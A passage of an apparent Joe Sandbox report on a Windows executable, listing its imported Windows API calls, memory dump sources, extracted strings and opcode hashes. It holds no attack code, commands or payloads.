• InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007888E5
Memory Dump Source
• Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00753712
• GetWindowThreadProcessId.USER32(?,00000000), ref: 00753723
• GetCurrentThreadId.KERNEL32 ref: 0075372A
• AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00753731
APIs
  • Part of subcall function 006F1F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 006F1F87
  • Part of subcall function 006F1F2D: SelectObject.GDI32(?,00000000), ref: 006F1F96
  • Part of subcall function 006F1F2D: BeginPath.GDI32(?), ref: 006F1FAD
  • Part of subcall function 006F1F2D: SelectObject.GDI32(?,00000000), ref: 006F1FD6
• MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 007892E3
• LineTo.GDI32(?,?,?), ref: 007892F0
• EndPath.GDI32(?), ref: 00789300
• StrokePath.GDI32(?), ref: 0078930E
APIs
• GetSysColor.USER32(00000008), ref: 006F21BC
• SetTextColor.GDI32(?,?), ref: 006F21C6
• SetBkMode.GDI32(?,00000001), ref: 006F21D9
• GetStockObject.GDI32(00000005), ref: 006F21E1
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0074EC36
                                                                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0074EC40
                                                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0074EC60
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(?), ref: 0074EC81
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                              • Opcode ID: f50d534b405523df64d145ac942369a61e6383d1ca7ab8d4ecb0d832ade40d8b
                                                                                                                                                                                                                                                                              • Instruction ID: 218960c880ba25e4ea0a7deaed650bb38adbe19c49e37504101534d4c309cf86
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f50d534b405523df64d145ac942369a61e6383d1ca7ab8d4ecb0d832ade40d8b
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 59E0E570940208DFCB509FA09948A6DBBB2AB08310B208449F94AE3290D73C5901AF18
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0074EC4A
                                                                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0074EC54
                                                                                                                                                                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0074EC60
                                                                                                                                                                                                                                                                              • ReleaseDC.USER32(?), ref: 0074EC81
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 2889604237-0
                                                                                                                                                                                                                                                                              • Opcode ID: b740fd99a1913c8531c6ad5752e827f6a5cc0078561233cec179f6868e561dcb
                                                                                                                                                                                                                                                                              • Instruction ID: 75e405516f436967e62c3743dd474f4a712d118c006379a24afda3ad0cb96ede
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b740fd99a1913c8531c6ad5752e827f6a5cc0078561233cec179f6868e561dcb
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8E01A70D40208DFCB609FA0D84CA5DBBB2AF08310B208409F949E3290D73C59019F08
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LoadString
                                                                                                                                                                                                                                                                              • String ID: @COM_EVENTOBJ$bnu
                                                                                                                                                                                                                                                                              • API String ID: 2948472770-255016743
                                                                                                                                                                                                                                                                              • Opcode ID: f0b78a074a99fadc832d1aaee351b405a1abdb3c860f2eefb3a9a805bce2e544
                                                                                                                                                                                                                                                                              • Instruction ID: 880653f3de55abdd6dc9a0126ff0b3afd99f1884cffcdbce2cee6fe1bcb9f486
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f0b78a074a99fadc832d1aaee351b405a1abdb3c860f2eefb3a9a805bce2e544
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCF1AB70A08300DFD724DF14C885B6EB7E1BF84704F14891DF59A9B2A1DB79EA85CB92
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 007105B2: EnterCriticalSection.KERNEL32(007C170C,?,00000000,?,006FD22A,007C3570,00000001,00000000,?,?,0076F023,?,?,00000000,00000001,?), ref: 007105BD
                                                                                                                                                                                                                                                                                • Part of subcall function 007105B2: LeaveCriticalSection.KERNEL32(007C170C,?,006FD22A,007C3570,00000001,00000000,?,?,0076F023,?,?,00000000,00000001,?,00000001,007C2430), ref: 007105FA
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 00710413: __onexit.LIBCMT ref: 00710419
                                                                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 00778658
                                                                                                                                                                                                                                                                                • Part of subcall function 00710568: EnterCriticalSection.KERNEL32(007C170C,00000000,?,006FD258,007C3570,007327C9,00000001,00000000,?,?,0076F023,?,?,00000000,00000001,?), ref: 00710572
                                                                                                                                                                                                                                                                                • Part of subcall function 00710568: LeaveCriticalSection.KERNEL32(007C170C,?,006FD258,007C3570,007327C9,00000001,00000000,?,?,0076F023,?,?,00000000,00000001,?,00000001), ref: 007105A5
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                                                                                                                                                              • String ID: Variable must be of type 'Object'.$bnu
                                                                                                                                                                                                                                                                              • API String ID: 535116098-1566058606
                                                                                                                                                                                                                                                                              • Opcode ID: dbff8424b1111f972050ce2c6d5c09adac12ecfac0075f5ca77cd51494490d98
                                                                                                                                                                                                                                                                              • Instruction ID: 379a1249710d48ce3ef51a6ab622cc360c36c87162d6c2bfeb1ab42be5e0e999
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dbff8424b1111f972050ce2c6d5c09adac12ecfac0075f5ca77cd51494490d98
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 39916D74A40208EFCF44EF94D899DAD77B2BF04340F10815DF91AAB292DB79AE41CB52
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F41EA: _wcslen.LIBCMT ref: 006F41EF
                                                                                                                                                                                                                                                                              • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00765919
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Connection_wcslen
                                                                                                                                                                                                                                                                              • String ID: *$LPT
                                                                                                                                                                                                                                                                              • API String ID: 1725874428-3443410124
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • OleSetContainedObject.OLE32(?,00000001), ref: 007558AF
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ContainedObject
                                                                                                                                                                                                                                                                              • String ID: 0$|$Container
                                                                                                                                                                                                                                                                              • API String ID: 3565006973-49173154
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                              • String ID: #
                                                                                                                                                                                                                                                                              • API String ID: 0-1885708031
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 0070F6DB
                                                                                                                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 0070F6F4
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                                                              • API String ID: 2783356886-2766056989
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 007840BD
                                                                                                                                                                                                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 007840F8
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$DestroyMove
                                                                                                                                                                                                                                                                              • String ID: static
                                                                                                                                                                                                                                                                              • API String ID: 2139405536-2160076837
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 007850BD
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 007850D2
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                                                                                                                              • String ID: '
                                                                                                                                                                                                                                                                              • API String ID: 3850602802-1997036262
                                                                                                                                                                                                                                                                              • Opcode ID: 9e219dc2f88abd359f05aa570063c2bb0b5a0dbd536a0d264612539322ebc6d6
                                                                                                                                                                                                                                                                              • Instruction ID: 8786356aee76101b06532d1f94951f5258f2a36f66579f3e422fca62a9bf4955
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e219dc2f88abd359f05aa570063c2bb0b5a0dbd536a0d264612539322ebc6d6
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4316A74A0070A9FDB14DFA9C880BEE7BB5FF09300F10406AE904AB391D775A945CF90
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F249F: GetWindowLongW.USER32(00000000,000000EB), ref: 006F24B0
                                                                                                                                                                                                                                                                                • Part of subcall function 006F2234: GetWindowLongW.USER32(?,000000EB), ref: 006F2242
                                                                                                                                                                                                                                                                              • GetParent.USER32(?), ref: 00733440
                                                                                                                                                                                                                                                                              • DefDlgProcW.USER32(?,00000133,?,?,?,?), ref: 007334CA
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: LongWindow$ParentProc
                                                                                                                                                                                                                                                                              • String ID: (|
                                                                                                                                                                                                                                                                              • API String ID: 2181805148-3772712737
                                                                                                                                                                                                                                                                              • Opcode ID: b93441d1b6692f31e6d611784e5e7425906a6a7b0700c0279fa8f2fb4096dae4
                                                                                                                                                                                                                                                                              • Instruction ID: 1b1f7e93efd0fbdd3fe00b315cb7669583a4cc17ffbb5881e99e4ad2745ba20d
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b93441d1b6692f31e6d611784e5e7425906a6a7b0700c0279fa8f2fb4096dae4
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9721AD30201189AFDB369F68CC69DB93B67EF06360F144258F7294B2E2C7399E52DB14
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006F78B1
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7873: GetStockObject.GDI32(00000011), ref: 006F78C5
                                                                                                                                                                                                                                                                                • Part of subcall function 006F7873: SendMessageW.USER32(00000000,00000030,00000000), ref: 006F78CF
                                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 00784216
                                                                                                                                                                                                                                                                              • GetSysColor.USER32(00000012), ref: 00784230
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                                                                                                                                                                                                              • String ID: static
                                                                                                                                                                                                                                                                              • API String ID: 1983116058-2160076837
                                                                                                                                                                                                                                                                              • Opcode ID: 4c978d3296cb4826d881cd1ab73977191c302c4e5b05d8dffbc13f3ca5a5a48e
                                                                                                                                                                                                                                                                              • Instruction ID: e7dd23a7c24e9abebf4587b06286c802ad6421de3c301dac22fe3173b96e3cef
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c978d3296cb4826d881cd1ab73977191c302c4e5b05d8dffbc13f3ca5a5a48e
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 421126B265020AAFDB10EFA8CC45AFA7BE8FB08354F014528FD55E3250E678E8519B64
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0076D7C2
                                                                                                                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0076D7EB
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397353438.00000000006F0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.000000000078D000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397555005.00000000007B3000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397683734.00000000007BD000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              • Associated: 0000001A.00000002.3397743188.00000000007C5000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Internet$OpenOption
                                                                                                                                                                                                                                                                              • String ID: <local>
                                                                                                                                                                                                                                                                              • API String ID: 942729171-4266983199
                                                                                                                                                                                                                                                                              • Opcode ID: dea337d9e4b4981e5eaf1762e6ca184bd01c4275dba1eda738d4930ef5a43af8
                                                                                                                                                                                                                                                                              • Instruction ID: d9943501555bf798a96d5d1ec2ace03d86ffcedc1d1dd07b1ee72c652ba1f622
                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dea337d9e4b4981e5eaf1762e6ca184bd01c4275dba1eda738d4930ef5a43af8
                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E011C671B6523279D7344B668C85EE7BE5DEB127A4F104226B90A92180D6689C40D6F1
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                              • CharUpperBuffW.USER32(?,?,?), ref: 0075761D
                                                                                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00757629
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                                                                                                                              • String ID: STOP
                                                                                                                                                                                                                                                                              • API String ID: 1256254125-2411985666
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00752699
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00752593
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00752615
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                • Part of subcall function 006FB329: _wcslen.LIBCMT ref: 006FB333
                                                                                                                                                                                                                                                                                • Part of subcall function 007545FD: GetClassNameW.USER32(?,?,000000FF), ref: 00754620
                                                                                                                                                                                                                                                                              • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00752720
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000001A.00000002.3397396687.00000000006F1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_26_2_6f0000_Inf.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: ClassMessageNameSend_wcslen
                                                                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                                                              • API String ID: 624084870-1403004172
                                                                                                                                                                                                                                                                              • Opcode ID: d083a7a5bfc7961e4566bcc07c80c5f175d87606635abbf44fea7fdb17907aa1
                                                                                                                                                                                                                                                                              • Instruction ID: 0a0cab18f67be37280603b4c04f53db3528dcaf058ab6565b7f82183c3ce5a8b
